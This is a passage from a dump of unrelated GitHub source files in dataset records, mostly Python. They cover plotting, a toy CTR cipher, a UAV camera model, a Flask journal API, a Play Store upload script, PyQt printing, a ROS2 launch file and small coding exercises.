win.addPlot(title=self.title)\n view_boxes[self.view_box_id] = self.view_box\n else:\n win.nextRow()\n self.view_box = win.addPlot(title=self.title)\n self.init_view_box(self.view_box)\n self.render()\n\n\n# Built-in stuff below.\n\nnum_plots_in_window = 0\ndef new_row_id():\n global num_plots_in_window\n print('aa', num_plots_in_window)\n num_plots_in_window += 1\n return num_plots_in_window\n\n\nclass TimeseriesPlot(Display):\n def __init__(self):\n super().__init__()\n self.value_data = deque([], maxlen=DEFAULT_MAX_DATA_SERIES_LENGTH)\n self.time_data = deque([], maxlen=DEFAULT_MAX_DATA_SERIES_LENGTH)\n @classmethod\n def accepts_value(cls, value):\n return is_number(value)\n\n def add_value(self, message):\n self.time_data.append(message[TIME])\n self.value_data.append(float(message[VALUE]))\n\n def init_view_box(self, view_box):\n view_box.showAxis('left', False)\n view_box.showAxis('right', True)\n self.curve = view_box.plot()\n def render(self):\n self.curve.setData(self.time_data, self.value_data)\n\nclass XYPlot(Display):\n def __init__(self):\n super().__init__()\n self.x_data = deque([], maxlen=DEFAULT_MAX_DATA_SERIES_LENGTH)\n self.y_data = deque([], maxlen=DEFAULT_MAX_DATA_SERIES_LENGTH)\n self.vector_data = deque([], maxlen=DEFAULT_MAX_DATA_SERIES_LENGTH)\n self.curve = None\n self.curve_point = None\n @classmethod\n def accepts_value(cls, value):\n return is_vector(value)\n\n def add_value(self, message):\n vector = message[VALUE]\n assert is_vector(vector)\n self.x_data.append(vector[0])\n self.y_data.append(vector[1])\n self.vector_data.append(vector)\n\n def init_view_box(self, view_box):\n self.curve = view_box.plot()\n self.curve.setData(self.x_data, self.y_data)\n self.curve_point = pg.CurvePoint(self.curve)\n view_box.addItem(self.curve_point)\n self.point_label = pg.TextItem('[?, ?]', anchor=(0.5, -1.0))\n self.point_label.setParentItem(self.curve_point)\n arrow2 = pg.ArrowItem(angle=90)\n arrow2.setParentItem(self.curve_point)\n\n def render(self):\n index = min(len(self.x_data), len(self.y_data))-1\n self.curve.setData(self.x_data, self.y_data)\n self.curve_point.setIndex(0) # Force a redraw if if the length doesn't change\n self.curve_point.setIndex(index)\n self.point_label.setText('[{}]'.format(\n ', '.join([ '{:0.1f}'.format(val) for val in self.vector_data[index] ])\n ))\n\ndef is_number(s):\n try:\n float(s)\n return True\n except Exception:\n return False\ndef is_vector(vector):\n try:\n assert len(vector) >= 2\n assert is_number(vector[0])\n assert is_number(vector[1])\n return True\n except Exception:\n return False\n\ndefault_display_classes = [\n TimeseriesPlot,\n XYPlot,\n]\n","repo_name":"DomNomNom/quicktracer","sub_path":"quicktracer/displays.py","file_name":"displays.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"39423708747","text":"import Repositorio\r\n\r\nlookupTable = {\"0000\":\"0011\", \"0001\":\"0100\", \"0010\":\"0101\", \"0011\":\"0110\",\r\n \"0100\":\"0111\", \"0101\":\"1001\", \"0110\":\"1101\", \"0111\":\"1111\",\r\n \"1000\":\"1100\", \"1001\":\"1110\", \"1010\":\"1011\", \"1011\":\"1010\",\r\n \"1100\":\"1000\", \"1101\":\"0001\", \"1110\":\"0010\", \"1111\": \"0000\"}\r\n\r\n\r\n# Funciones\r\n\r\n# funcion que realiza el algoritmo CTR\r\ndef obtenerCifrado(M, K):\r\n # varialbles\r\n nonce = \"01\"\r\n contador = \"00\"\r\n _M = M[:4] #bits mas significativos\r\n M_ = M[4:] #bits menos significativos\r\n resultado = \"\"\r\n\r\n # algoritmo en bucle, mientras el contador no se '10' (maximo numero del contador para mensaje de 8 bits)\r\n while contador!=\"10\":\r\n # concatenacion nonce||contador\r\n nonce_contador = nonce + contador\r\n #sumar xor K⊕nonce||contador\r\n suma = Repositorio.sumaXOR(K, nonce_contador)\r\n # busqueda en la tabla de verdad para e cifrado simple\r\n E = lookupTable.get(suma)\r\n if E == None: # si no encuentra el resultado en la tabla\r\n print(\"No se puede cifrar este numero\")\r\n break\r\n else: # si lo encuentra\r\n if contador == \"00\": # opera con _M\r\n resultado += Repositorio.sumaXOR(_M, E)\r\n else: # opera con M_\r\n resultado += Repositorio.sumaXOR(M_, E)\r\n print(\"-Nonce: \", nonce, \"-Contador: \", contador, \"-Bloque E: \", E, \"-Resultado: \", resultado)\r\n # incrementa el contador\r\n contador = sumarContador(contador)\r\n # devuelve el mensaje cifrado\r\n print()\r\n print(\"El texto cifrado con CTR es: \", resultado)\r\n\r\n\r\n# suma el contador binario\r\ndef sumarContador(c):\r\n # parsea a entero y suma en 1\r\n contador = int(c) + 1\r\n # parsea a binario y saca los digitos '0b'\r\n contador = bin(contador)[2:]\r\n # verifica que la longitud del contador sea maximo 2 digitos (dos bits)\r\n if len(contador) == 1:\r\n # si el contador es 1, se agrega un 0 delante\r\n contador = str(contador).zfill(2)\r\n elif len(contador) > 2:\r\n # si el contador es mayo a dos digitos, se obtienen los dos primeros\r\n contador = str(contador)[2:]\r\n # retorna el contador\r\n return contador\r\n\r\n\r\n","repo_name":"Chrisnb1/CTR-y-HMAC-algorithm","sub_path":"CTR.py","file_name":"CTR.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13190140110","text":"\"\"\"\nmavsim: camera viewer (for chapter 13)\n - Beard & McLain, PUP, 2012\n - Update history:\n 4/15/2019 - RWB\n 3/31/2022 - RWB\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport parameters.camera_parameters as CAM\nfrom tools.rotations import Euler2Rotation\nfrom message_types.msg_camera import MsgCamera\n\nclass Camera:\n def __init__(self):\n self.target_points = self._getPoints()\n self.pixels = MsgCamera()\n self.projected_points = []\n\n def updateProjectedPoints(self, state, target_position):\n mav_position = np.array([[state.north], [state.east], [-state.altitude]]) # NED coordinates\n # attitude of mav as a rotation matrix R from body to inertial\n R = Euler2Rotation(state.phi, state.theta, state.psi) # R_b^i\n Rgim = Euler2Rotation(0, state.camera_el, state.camera_az) # R_g^b\n Rcam = np.array([[0, 1, 0], [0, 0, 1], [1, 0, 0]]) # R_g^c\n Rtarget = np.eye(3) # R_t^i\n points = self._rotatePoints(self.target_points, Rtarget) # rotate target to inertial frame\n points = self._translatePoints(points, target_position - mav_position) # translate to camera frame\n points = self._rotatePoints(points, Rgim.T @ R.T) # rotate into the gimbal frame\n points = self._rotatePoints(points, Rcam) # rotate into camera frame\n # rotate and translate points defining mav\n self.projected_points = self._projectOnCameraPlane(points)\n # set pixel value as the first projected point\n self.pixels.pixel_x = self.projected_points[0, 0]\n self.pixels.pixel_y = self.projected_points[1, 0]\n\n def getPixels(self):\n return self.pixels\n\n def getProjectedPoints(self):\n return self.projected_points\n\n def _projectOnCameraPlane(self, points):\n m, n = points.shape\n projected_points = np.zeros((2, n))\n for i in range(0, n):\n projected_points[0, i] = CAM.f * points[0, i] / points[2, i]\n projected_points[1, i] = CAM.f * points[1, i] / points[2, i]\n return projected_points\n\n def _rotatePoints(self, points, R):\n \"Rotate points by the rotation matrix R\"\n rotated_points = R @ points\n return rotated_points\n\n def _translatePoints(self, points, translation):\n \"Translate points by the vector translation\"\n translated_points = points + np.dot(translation, np.ones([1, points.shape[1]]))\n return translated_points\n\n def _getPoints(self):\n # Points that define the target, and the colors of the triangular mesh\n length = 100\n # points are in NED coordinates\n # define the points on the target (3D box)\n points = np.array([\n [length / 2, length / 2, 0], # point 0\n [length / 2, -length / 2, 0], # point 1\n [-length / 2, -length / 2, 0], # point 2\n [-length / 2, length / 2, 0], # point 3\n [length / 2, length / 2, -length], # point 4\n [length / 2, -length / 2, -length], # point 5\n [-length / 2, -length / 2, -length], # point 6\n [-length / 2, length / 2, -length], # point 7\n ]).T\n return points\n","repo_name":"randybeard/mavsim_public","sub_path":"mavsim_python/models/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":294,"dataset":"github-code","pt":"81"} +{"seq_id":"28906618351","text":"\n\ndef merge(intervals):\n # Check if length of intervals is less than or equal to 1\n if(len(intervals) <= 1):\n return intervals\n\n # Sort intervals based on first element of each interval\n intervals.sort(key=lambda x: x[0])\n\n # Create a list of integers to store result\n result = []\n\n # Create newInterval array and assign first interval of intervals to it\n newInterval = intervals[0]\n\n # Add newInterval to result\n result.append(newInterval)\n\n # Iterate through intervals\n for interval in intervals:\n # Check if first element of interval is less than or equal to last element of newInterval\n if(interval[0] <= newInterval[1]):\n # IF true, update last element of newInterval to largest of the two\n newInterval[1] = max(newInterval[1], interval[1])\n # ELSE, assign interval to newInterval and add it to result\n else:\n newInterval = interval\n result.append(newInterval)\n \n # Return result as 2D array of integers\n return result","repo_name":"zofialuther/CS8395-08-Paper1","sub_path":"pseudo_and_code_to_python/problem_23.py","file_name":"problem_23.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8688586598","text":"from django.core.management.base import BaseCommand\r\nfrom django.utils import timezone\r\nfrom django.conf import settings\r\nimport glob, os\r\nfrom apps.formbuilder.models import Form, FormPage, FormElement, FormElementOption\r\n\r\n\r\nclass Command(BaseCommand):\r\n help = 'Cleanup unused objects from form'\r\n\r\n def handle(self, *args, **kwargs):\r\n used_pages = []\r\n forms = Form.objects.filter(date_deleted=None)\r\n for form in forms:\r\n for page in form.pages.all():\r\n if not page in used_pages:\r\n used_pages.append(page.id)\r\n element_count = 0\r\n option_count = 0\r\n page_count = 0\r\n all_pages = FormPage.objects.filter()\r\n for page in all_pages:\r\n if not page.id in used_pages:\r\n if page.elements.exists():\r\n for element in page.elements.all():\r\n if element.options.exists():\r\n for option in element.options.all():\r\n option.delete()\r\n option_count+=1\r\n element.delete()\r\n element_count+=1\r\n page.delete()\r\n page_count+=1\r\n print(str(element_count) + ' element objects deleted')\r\n print(str(option_count) + ' option objects deleted')\r\n print(str(page_count) + ' page objects deleted')\r\n","repo_name":"KCuppens/GenesisV2","sub_path":"apps/formbuilder/management/commands/cleanup_unused_objects.py","file_name":"cleanup_unused_objects.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28156326247","text":"import sqlite3\nfrom flask import Flask, request, jsonify\nfrom datetime import datetime\nfrom cryptography.fernet import Fernet\n\napp = Flask(__name__)\n\n\ndef init_db():\n conn = sqlite3.connect('journal.db')\n c = conn.cursor()\n c.execute(\n '''CREATE TABLE IF NOT EXISTS journal_entries (id INTEGER PRIMARY KEY, encrypted_content TEXT, key TEXT, \n timestamp TEXT, pinned INTEGER DEFAULT 0)''')\n conn.commit()\n conn.close()\n\n\n@app.route('/api/entry', methods=['POST'])\ndef save_entry():\n content = request.json.get('content')\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n key = Fernet.generate_key()\n fernet = Fernet(key)\n encrypted_content = fernet.encrypt(content.encode('utf-8'))\n\n conn = sqlite3.connect('journal.db')\n c = conn.cursor()\n c.execute(\"INSERT INTO journal_entries (encrypted_content, key, timestamp) VALUES (?, ?, ?)\",\n (encrypted_content, key, timestamp))\n conn.commit()\n conn.close()\n\n return jsonify({\"status\": \"success\"})\n\n\n@app.route('/api/entries', methods=['GET'])\ndef get_entries():\n conn = sqlite3.connect('journal.db')\n c = conn.cursor()\n c.execute(\"SELECT * FROM journal_entries\")\n\n entries = []\n for row in c.fetchall():\n id = row[0]\n encrypted_content = row[1]\n key = row[2]\n timestamp = row[3]\n pinned = bool(row[4])\n\n # Decrypt the content using the key\n fernet = Fernet(key)\n content = fernet.decrypt(encrypted_content).decode('utf-8')\n\n entries.append({\n 'id': id,\n 'content': content,\n 'timestamp': timestamp,\n 'pinned': pinned\n })\n\n conn.close()\n\n entries.reverse()\n\n return jsonify(entries)\n\n\n@app.route('/api/entry/', methods=['DELETE'])\ndef delete_entry(entry_id):\n conn = sqlite3.connect('journal.db')\n c = conn.cursor()\n c.execute(\"DELETE FROM journal_entries WHERE id=?\", (entry_id,))\n conn.commit()\n conn.close()\n\n return jsonify({\"status\": \"success\"})\n\n\n@app.route('/api/pin/', methods=['POST'])\ndef pin_entry():\n entry_id = request.json.get('entry_id')\n\n conn = sqlite3.connect('journal.db')\n c = conn.cursor()\n c.execute(\"UPDATE journal_entries SET pinned = 1 WHERE id=?\", (entry_id,))\n conn.commit()\n conn.close()\n\n return jsonify({\"status\": \"success\"})\n\n\n@app.route('/api/unpin/', methods=['POST'])\ndef unpin_entry():\n entry_id = request.json.get('entry_id')\n conn = sqlite3.connect('journal.db')\n c = conn.cursor()\n c.execute(\"UPDATE journal_entries SET pinned = 0 WHERE id=?\", (entry_id,))\n conn.commit()\n conn.close()\n\n return jsonify({\"status\": \"success\"})\n\n\nif __name__ == '__main__':\n init_db()\n app.run(debug=True)\n","repo_name":"ElijahBare/Dayly","sub_path":"backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"9089372295","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# vim: ai ts=4 sts=4 et sw=4 nu\n\nfrom __future__ import (unicode_literals, absolute_import,\n division, print_function)\nimport logging\nimport sys\nimport os\nimport json\nimport requests\nimport tempfile\nimport shutil\nimport codecs\nfrom subprocess import call\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import StringIO\n\n# check for python version as google client api is broken on py2\nif sys.version_info.major < 3:\n print(\"You must run this script with python3 as \"\n \"Google API Client is broken python2\")\n sys.exit(1)\n\nPLAY_STORE = 'play_store'\nALPHA = 'alpha'\nBETA = 'beta'\nPROD = 'production'\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\nfor handler in logging.root.handlers:\n handler.addFilter(logging.Filter('__main__'))\nCURRENT_PATH = os.path.dirname(os.path.abspath(__file__))\n\n\ndef usage(arg0, exit=None):\n print(\"Usage: {} \".format(arg0))\n if exit is not None:\n sys.exit(exit)\n\n\ndef syscall(args, shell=False, with_print=True):\n ''' execute an external command. Use shell=True if using bash specifics '''\n args = args.split()\n if with_print:\n print(u\"-----------\\n\" + u\" \".join(args) + u\"\\n-----------\")\n\n if shell:\n args = ' '.join(args)\n call(args, shell=shell)\n\ndef move_to_current_folder():\n os.chdir(CURRENT_PATH)\n\ndef get_remote_content(url):\n ''' file descriptor from remote file using GET '''\n req = requests.get(url)\n try:\n req.raise_for_status()\n except Exception as e:\n logger.error(\"Failed to load data at `{}`\".format(url))\n logger.exception(e)\n sys.exit(1)\n return StringIO.StringIO(req.text)\n\n\ndef get_local_content(path):\n ''' file descriptor from local file '''\n if not os.path.exists(path) or not os.path.isfile(path):\n logger.error(\"Unable to find JSON file `{}`\".format(path))\n sys.exit(1)\n\n try:\n fd = open(path, 'r')\n except Exception as e:\n logger.error(\"Unable to open file `{}`\".format(path))\n logger.exception(e)\n sys.exit(1)\n return fd\n\n\ndef is_remote_path(path):\n return path.startswith('http:')\n\n\ndef get_local_remote_fd(path):\n ''' file descriptor for a path (either local or remote) '''\n if is_remote_path(path):\n return get_remote_content(path)\n else:\n return get_local_content(path)\n\n\ndef copy_to(src, dst):\n ''' copy source content (local or remote) to local file '''\n local = None\n if is_remote_path(src):\n local = tempfile.NamedTemporaryFile(delete=False)\n download_remote_file(src, local.name)\n src = local.name\n shutil.copy(src, dst)\n if local is not None:\n os.remove(local.name)\n\n\ndef download_remote_file(url, path):\n ''' download url to path '''\n syscall('wget -c -O {path} {url}'.format(path=path, url=url))\n\n\ndef upload_to_play_store(jsdata, channel=None):\n if channel is None:\n channel = BETA\n\n logger.info(\"Starting Google Play Store using {}\".format(channel))\n\n # ensure dependencies are met\n try:\n import httplib2\n from apiclient.discovery import build\n from oauth2client import client\n from oauth2client.service_account import ServiceAccountCredentials\n except ImportError as error:\n logger.error(\"You don't have module {0} installed\".format(error))\n logger.error(\"Missing Google API Client dependency.\\n\"\n \"Please install with: \\n\"\n \"apt-get install libffi-dev libssl-dev python3-pip\\n\"\n \"pip3 install google-api-python-client PyOpenSSL\\n\"\n \"Install from github in case of oauth http errors.\")\n return\n\n if 'GOOGLE_API_KEY' not in os.environ:\n logger.error(\"You need to set the GOOGLE_API_KEY environment variable \"\n \"to use the Google API (using path to google-api.p12)\")\n return\n\n GOOGLE_CLIENT_ID = '107823297044-nhoqv99cpr86vlfcronskirgib2g7tq' \\\n '9@developer.gserviceaccount.com'\n\n service = build('androidpublisher', 'v2')\n scope = 'https://www.googleapis.com/auth/androidpublisher'\n key = os.environ['GOOGLE_API_KEY']\n credentials = ServiceAccountCredentials.from_p12_keyfile(\n GOOGLE_CLIENT_ID,\n key,\n scopes=[scope])\n\n http = httplib2.Http()\n http = credentials.authorize(http)\n\n service = build('androidpublisher', 'v2', http=http)\n\n package_name = jsdata['package']\n version_name = jsdata['version_name']\n apk_file = os.path.join(CURRENT_PATH, 'build', 'outputs', 'apk',\n '{}-{}.apk'.format(package_name, version_name))\n\n json_file_dir = os.path.abspath(os.path.dirname(jspath))\n\n # download remote zim file\n if is_remote_path(jsdata.get('zim_file')):\n zimfile_url = jsdata.get('zim_file')\n remote_filename = get_remote_file_name(zimfile_url)\n local_file_path = os.path.join(json_file_dir, remote_filename)\n download_remote_file(zimfile_url, local_file_path)\n jsdata.update({'zim_file': local_file_path})\n\n # update relative paths to absolute\n os.chdir(json_file_dir)\n jsdata.update({'zim_file': os.path.abspath(jsdata.get('zim_file'))})\n move_to_current_folder()\n\n if not jsdata.get('embed_zim', False):\n comp_file = tempfile.NamedTemporaryFile(suffix='.a').name\n copy_to(jsdata['zim_file'], comp_file)\n\n try:\n # another edit request\n edit_request = service.edits().insert(body={},\n packageName=package_name)\n result = edit_request.execute()\n edit_id = result['id']\n\n logger.info(\"Starting Edit `{}`\".format(edit_id))\n\n # upload APK\n logger.info(\"Uploading APK file: {}\".format(apk_file))\n apk_response = service.edits().apks().upload(\n editId=edit_id,\n packageName=package_name,\n media_body=apk_file).execute()\n\n logger.debug(\"APK for version code {} has been uploaded\"\n .format(apk_response['versionCode']))\n\n # release APK into the specified channel\n track_response = service.edits().tracks().update(\n editId=edit_id,\n track=channel,\n packageName=package_name,\n body={'versionCodes': [apk_response['versionCode']]}).execute()\n\n logger.debug(\"Publication set to {} for version code {}\"\n .format(track_response['track'],\n str(track_response['versionCodes'])))\n\n # upload companion file\n if comp_file:\n logger.info(\"Uploading Expansion file: {}\".format(comp_file))\n comp_response = service.edits().expansionfiles().upload(\n editId=edit_id,\n packageName=package_name,\n apkVersionCode=jsdata['version_code'],\n expansionFileType='main',\n media_body=comp_file).execute()\n\n logger.debug(\"Expansion file of size {} has been uploaded\"\n .format(comp_response['expansionFile']['fileSize']))\n\n commit_request = service.edits().commit(\n editId=edit_id, packageName=package_name).execute()\n\n logger.debug(\"Edit `{}` has been committed. done.\"\n .format(commit_request['id']))\n\n except client.AccessTokenRefreshError:\n logger.error(\"The credentials have been revoked or expired, \"\n \"please re-run the application to re-authorize\")\n\nSTORES = {\n 'play_store': upload_to_play_store,\n}\n\n\ndef main(json_path, store='{}:{}'.format(PLAY_STORE, ALPHA), *args):\n jsdata = json.load(get_local_remote_fd(json_path))\n\n logger.info(\"Uploading {} APK to {}\".format(jsdata['package'], store))\n\n try:\n store, channel = store.split(':', 1)\n except (IndexError, ValueError):\n channel = None\n\n STORES.get(store)(jsdata, channel=channel)\n\nif __name__ == '__main__':\n # ensure we were provided a JSON file as first argument\n if len(sys.argv) < 2:\n usage(sys.argv[0], 1)\n else:\n jspath = sys.argv[1]\n args = sys.argv[2:]\n\n main(jspath, *args)\n","repo_name":"kiwix/kiwix-xulrunner","sub_path":"android/upload-apk.py","file_name":"upload-apk.py","file_ext":"py","file_size_in_byte":8282,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"81"} +{"seq_id":"23305874344","text":"# Python Program To Read Characters From A Text File\r\n\r\n'''\r\nFunction Name : Read Characters From A Text File\r\nFunction Date : 24 Sep 2020\r\nFunction Author : Prasad Dangare\r\nInput : String\r\nOutput : String\r\n'''\r\n\r\nf = open('myfile.txt', 'r')\r\n\r\n# Read All Characters From File\r\n\r\nstr = f.read()\r\n\r\n# Display Them On The Screen\r\n\r\nprint(str)\r\n\r\n# Closing The File\r\n\r\nf.close()\r\n\r\n","repo_name":"PRASAD-DANGARE/PYTHON","sub_path":"files2.py","file_name":"files2.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"23337949828","text":"import re\n\nf = open(\"input.txt\", \"r\")\ntVisited = [[False for _ in range(300)] for _ in range(300)]\nhPos = [150, 150]\ntPos = [150, 150]\n\n\ndef calc_tpos():\n # Calc tail pos\n if y_diff() == 0 and abs(x_diff()) > 1:\n tPos[0] += (1 if x_diff() > 0 else -1)\n elif x_diff() == 0 and abs(y_diff()) > 1:\n tPos[1] += (1 if y_diff() > 0 else -1)\n elif abs(x_diff()) + abs(y_diff()) <= 2:\n return\n else:\n x_dir = (1 if x_diff() > 0 else -1)\n y_dir = (1 if y_diff() > 0 else -1)\n tPos[0] += x_dir\n tPos[1] += y_dir\n\n tVisited[tPos[0]][tPos[1]] = True\n\n\ndef x_diff():\n return hPos[0] - tPos[0]\n\n\ndef y_diff():\n return hPos[1] - tPos[1]\n\n\ntVisited[150][150] = True\n\nfor line in f:\n input_line = line.strip()\n input_re = re.compile(\"(.) (\\\\d+)\")\n input_match = input_re.match(input_line)\n dir = input_line[0]\n count = int(input_match.group(2))\n\n if dir == 'U':\n # hPos[0] += count\n for i in range(count):\n hPos[0] += 1\n calc_tpos()\n elif dir == 'D':\n # hPos[0] -= count\n for i in range(count):\n hPos[0] -= 1\n calc_tpos()\n elif dir == 'L':\n # hPos[1] -= count\n for i in range(count):\n hPos[1] -= 1\n calc_tpos()\n elif dir == 'R':\n # hPos[1] += count\n for i in range(count):\n hPos[1] += 1\n calc_tpos()\n else:\n raise RuntimeError(\"Unknown dir: \" + dir)\n\nvisited_count = 0\nfor i in tVisited:\n for j in i:\n if j:\n visited_count += 1\nprint(visited_count)\n","repo_name":"nyw18/advent-of-code-2022","sub_path":"09/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3800864582","text":"from utilities.inv import __inv__\n# binary search\n# assume that myList is sorted in an ascending order\n\nmyList = [18, 57, 96, 103, 132, 211, 231, 295, 296, 314, 315, 400, 441, 488, 613, 636, 766, 791, 830, 863]\nx = 132\nlow = 0\nhigh = len(myList) - 1\nmid = 0\nres = -1\nwhile low <= high and (res == -1):\n\t__inv__(myList=myList, x=x, low=low, high=high, mid=mid, res=res)\n\tmid = int((high + low) / 2)\n\n\tif myList[mid] < x:\n\t\tlow = mid + 1\n\telif myList[mid] > x:\n\t\thigh = mid - 1\n\telse:\n\t\tres = mid\n","repo_name":"AbuJabal-Hussein/Loop-Invariant-Synthesizer","sub_path":"benchmarks/hybrid_benchmarks/test2/test2_hybrid.py","file_name":"test2_hybrid.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"6742710367","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 4 11:59:44 2018\n\n@author: CHARLES\n\"\"\"\nfrom PyQt4.QtCore import SIGNAL, QSizeF\nfrom PyQt4.QtGui import QTextCursor, QPrinter, QFont, QTextDocument, QPrintDialog, QWidget, QFrame, QDateEdit, QPrintPreviewDialog, QCheckBox, QHBoxLayout, QGroupBox, QGridLayout, QDialog, QApplication, QPushButton, QLineEdit, QFormLayout, QLabel, QVBoxLayout\n\n\nclass PrintTable(QDialog):\n \n def __init__(self, table, parent=None):\n super(PrintTable, self).__init__(parent)\n self.table = table\n #self.handlePreview()\n #self.handlePrintPdf()\n \n def handlePrintPdf(self):\n printer = QPrinter()\n pdffile ='test.pdf'\n printer.setResolution(96)\n printer.setPageSize(QPrinter.Letter)\n printer.setOutputFormat(QPrinter.PdfFormat)\n printer.setOutputFileName(pdffile)\n printer.setPageMargins(5, 5, 5, 10, QPrinter.Millimeter)\n document = self.makeTableDocument()\n \n document.setPageSize(QSizeF(printer.pageRect().size()))\n document.print_(printer)\n \n \n def handlePrint(self):\n dialog = QPrintDialog()\n if dialog.exec_() == QDialog.Accepted:\n self.handlePaintRequest(dialog.printer())\n\n def handlePreview(self):\n dialog = QPrintPreviewDialog()\n dialog.setStyleSheet(\"table {border:1px; border-color:teal}\")\n dialog.setWindowTitle('Adedoyin Adetunji')\n #dialog.showMaximized()\n #dialog.setMaximumSize(True)\n #dialog.setResolution(96)\n #dialog.setPageSize(QPrinter.Letter)\n #dialog.setPageMargins(5, 5, 5, 10, QPrinter.Millimeter)\n dialog.paintRequested.connect(self.handlePaintRequest)\n dialog.exec_()\n \n def handlePaintRequest(self, printer):\n document = self.makeTableDocument()\n document.print_(printer)\n\n def makeTableDocument(self):\n printer = QPrinter()\n document = QTextDocument()\n document.setDefaultStyleSheet(\"table {border:1px; border-color:teal}\")\n document.setDefaultStyleSheet(\"h1, h2, h3 {color:teal}\")\n document.setDocumentMargin(0.0)\n document.setPageSize(QSizeF(printer.pageRect().size()))\n header = '''\n \n \n
\n

Desmond International College

\n

Km4, Happiness Street, Kafanchan

\n

Kaduna, Nigeria

\n
\n
\n

STUDENT DATA TABLE

\n
\n \n \n '''\n #print(dir(document))\n \n cursor = QTextCursor(document)\n rows = self.table.rowCount()\n columns = self.table.columnCount()\n cursor.insertHtml(header)\n table = cursor.insertTable(rows + 1, columns)\n formats = table.format()\n formats.setHeaderRowCount(1)\n table.setFormat(formats)\n formats = cursor.blockCharFormat()\n formats.setFontWeight(QFont.Bold)\n for column in range(columns):\n cursor.setCharFormat(formats)\n cursor.insertText(self.table.horizontalHeaderItem(column).text())\n cursor.movePosition(QTextCursor.NextCell)\n for row in range(rows):\n for column in range(columns):\n cursor.insertText(self.table.item(row, column).text())\n cursor.movePosition(QTextCursor.NextCell)\n \n \n return document\n \n def makeHeader(self):\n header = '''\n \n \n
\n

Desmond International College

\n

Km4, Happiness Street, Kafanchan

\n

Kaduna, Nigeria

\n
\n
\n

STUDENT DATA TABLE

\n
\n \n \n '''\n return header\n \n def makeTable(self, cols, rows, data):\n \n table = '
'\n table +='
SeverityRuleDescription
'\n table +=''\n table +=''\n for a in cols:\n table +='' \n table +=''\n table +=''\n table +=''\n table +=''\n \n table +='
'\n table += str(a)\n table +='
'\n table +=''\n \n \n return table","repo_name":"doyinspc/schoolmgtapp","sub_path":"connect/printtable.py","file_name":"printtable.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8540015032","text":"import os\n\nfrom ament_index_python.packages import get_package_share_directory\nfrom launch import LaunchDescription\n\nfrom launch.actions.include_launch_description import IncludeLaunchDescription\nfrom launch.launch_description_sources.python_launch_description_source import PythonLaunchDescriptionSource # noqa: E501\nimport launch_ros.actions\nimport yaml\n\n\ndef load_file(package_name, file_path):\n\n package_path = get_package_share_directory(package_name)\n absolute_file_path = os.path.join(package_path, file_path)\n\n try:\n with open(absolute_file_path, 'r') as file:\n return file.read()\n except EnvironmentError: # parent of IOError, OSError *and* WindowsError where available\n print('Couldnt load file ' + absolute_file_path)\n return None\n\n\ndef load_yaml(package_name, file_path):\n\n package_path = get_package_share_directory(package_name)\n absolute_file_path = os.path.join(package_path, file_path)\n\n try:\n with open(absolute_file_path, 'r') as file:\n return yaml.safe_load(file)\n except EnvironmentError: # parent of IOError, OSError *and* WindowsError where available\n print('Couldnt load yaml ' + absolute_file_path)\n return None\n\n\ndef generate_launch_description():\n\n robot_config_file = get_package_share_directory('robot_control') + \"/config/lbr_iiwa.yaml\"\n kuka_sunrise_dir = get_package_share_directory('kuka_sunrise')\n\n kuka_sunrise_interface = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([kuka_sunrise_dir, '/launch/kuka_sunrise.launch.py'])\n )\n\n joint_controller = launch_ros.actions.LifecycleNode(\n namespace=\"\", package='robot_control', executable='rate_scaled_controller', output='both',\n arguments=['--ros-args', '--log-level', 'info'], parameters=[robot_config_file,\n {'reference_rate': 12.0}],\n name='joint_controller', remappings=[('measured_joint_state', 'lbr_joint_state'),\n ('joint_command', 'lbr_joint_command')]\n )\n\n system_manager = launch_ros.actions.LifecycleNode(\n package='teleop_guided_robot', executable='system_manager', output='screen',\n name='system_manager', namespace=\"\"\n )\n\n map_arm = launch_ros.actions.Node(\n package='map_arm', executable='map_arm', output='screen', name='map_arm'\n )\n\n return LaunchDescription([\n kuka_sunrise_interface,\n system_manager,\n joint_controller,\n map_arm\n ])\n","repo_name":"kroshu/kinect_ros","sub_path":"map_arm/launch/kinect_driver_arm_tracking.launch.py","file_name":"kinect_driver_arm_tracking.launch.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"31392337236","text":"class Solution:\n def subsetsWithDup(self, nums: List[int]) -> List[List[int]]:\n sol, new_sol = list(), list() \n def dfs(visit, pos):\n if pos == len(nums):\n l = []\n for i in range(len(nums)):\n if visit&(1< 0:\n l.append(nums[i])\n sol.append(l)\n return\n dfs(visit, pos+1)\n dfs(visit|(1<= 0:\r\n c1 = c1 - 1\r\n max_n2 = 